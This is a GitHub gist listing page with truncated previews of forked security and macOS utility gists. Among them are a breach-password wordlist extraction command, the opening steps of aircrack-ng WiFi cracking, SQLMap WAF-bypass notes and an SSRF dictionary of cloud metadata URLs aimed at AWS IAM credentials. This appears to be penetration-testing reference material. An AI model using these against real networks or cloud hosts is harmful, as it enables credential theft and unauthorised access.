Each of these commands will run an ad hoc http static server in your current (or specified) directory, available at http://localhost:8000. Use this power wisely.
$ python -m SimpleHTTPServer 8000
❂ duraki
duraki
/ shell_bind_tcp.asm
Created
December 9, 2017 18:54
— forked from geyslan/shell_bind_tcp.asm
Shell Bind TCP in Assembly (Linux/x86)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ; This is a snippet of the original file in https://github.com/geyslan/SLAE/blob/master/1st.assignment/shell_bind_tcp.asm | |
| global _start | |
| section .text | |
| _start: | |
| ; syscalls (/usr/include/asm/unistd_32.h) | |
| ; socketcall numbers (/usr/include/linux/net.h) |
duraki
/ breach_compilation_passlist-extraction.txt
Last active
May 7, 2022 12:49
1.4 billion password breach compilation wordlist
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # => create a wordlist from original 41G stash via: | |
| $ grep -rohP '(?<=:).*$' | uniq > breachcompilation.txt | |
| # => compressed with: | |
| $ 7z a breachcompilation.txt.7z breachcompilation.txt | |
| # => size (rel): | |
| ## 4.1G compressed | |
| ## 9.0G uncompressed |
duraki
/ web-servers.md
Created
February 5, 2018 17:46
— forked from willurd/web-servers.md
Big list of http static server one-liners
duraki
/ gist:cff95010c15a0ebcded372179b7b0f42
Created
January 17, 2019 11:40
— forked from carnal0wnage/gist:606c41ac6ec40bf5c69d4db96d9312e3
Red Team Books
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| From: http://redteams.net/bookshelf/ | |
| Techie | |
| Unauthorised Access: Physical Penetration Testing For IT Security Teams by Wil Allsopp. | |
| Social Engineering: The Art of Human Hacking by Christopher Hadnagy | |
| Practical Lock Picking: A Physical Penetration Tester's Training Guide by Deviant Ollam | |
| The Art of Deception: Controlling the Human Element of Security by Kevin Mitnick | |
| Hacking: The Art of Exploitation by Jon Erickson and Hacking Exposed by Stuart McClure and others. | |
| Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning by Fyodor | |
| The Shellcoder's Handbook: Discovering and Exploiting Security Holes by several authors |
duraki
/ Aircrack Commands
Created
March 22, 2019 10:24
— forked from victorreyesh/Aircrack Commands
Cracking WPA2 / WEP Wifi / Aircrack 10 seconds guide. For Mac OSX
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| //Install Macports. | |
| //Install aircrack-ng: | |
| sudo port install aircrack-ng | |
| //Install the latest Xcode, with the Command Line Tools. | |
| //Create the following symlink: | |
| sudo ln -s /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport /usr/sbin/airport | |
| //Figure out which channel you need to sniff: | |
| sudo airport -s | |
| sudo airport en1 sniff [CHANNEL] |
duraki
/ sqlmap-tamper-scripts-evaluation.md
Created
July 4, 2019 12:59
— forked from mgeeky/sqlmap-tamper-scripts-evaluation.md
SQLMap Tamper scripts evaluation against F5 Big-IP ASM WAF
The below table represents results of tests launched against F5 Big-IP ASM WAF appliance in it's XX version of YY and ZZ version of XY
Below names are to be passed to the --tamper= parameter of sqlmap.
The column Violation Rating represents most dominant rating of topmost 20 Requests observed by F5 in it's Security>>Event Logs:Application:Requests view.
The scale is 0-5.
duraki
/ cloud_metadata.txt
Created
January 7, 2020 22:09
— forked from jhaddix/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## AWS | |
| # from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories | |
| http://169.254.169.254/latest/user-data | |
| http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME] | |
| http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME] | |
| http://169.254.169.254/latest/meta-data/ami-id | |
| http://169.254.169.254/latest/meta-data/reservation-id | |
| http://169.254.169.254/latest/meta-data/hostname | |
| http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key |
duraki
/ add_debug_entitlement.sh
Created
October 11, 2021 20:29
— forked from talaviram/add_debug_entitlement.sh
Simple Utility Script for allowing debug of hardened macOS apps.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #! /bin/bash | |
| # Simple Utility Script for allowing debug of hardened macOS apps. | |
| # This is useful mostly for plug-in developer that would like keep developing without turning SIP off. | |
| # Credit for idea goes to (McMartin): https://forum.juce.com/t/apple-gatekeeper-notarised-distributables/29952/57?u=ttg | |
| app_path=$1 | |
| if [ -z "$app_path" ]; | |
| then | |
| echo "You need to specify app to re-codesign!" | |
| exit 0 |
duraki
/ OS X Code Signing Pyinstaller.md
Created
October 3, 2022 09:36
— forked from txoof/OS X Code Signing Pyinstaller.md
- Create a developer account with Apple
- https://developer.apple.com and shell out $99 for a developer account
- Download and install X-Code from the Apple App Store
- Open and run X-Code app and install whatever extras it requires
- Open the preferences pane (cmd+,)
- click the
+in the lower right corner - choose
Apple ID - enter your apple ID and password
- click the
- Previously created keys can be downloaded and installed from https://developer.apple.com
duraki
/ hide-all-app.scpt
Created
October 3, 2022 19:36
— forked from Teraflopst/hide-all-app.scpt
AppleScript: Hide all applications and show the desktop on Mac
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| tell application "Finder" | |
| set visible of every process whose visible is true and name is not "Finder" to false | |
| set the collapsed of windows to true | |
| end tell |
OlderNewer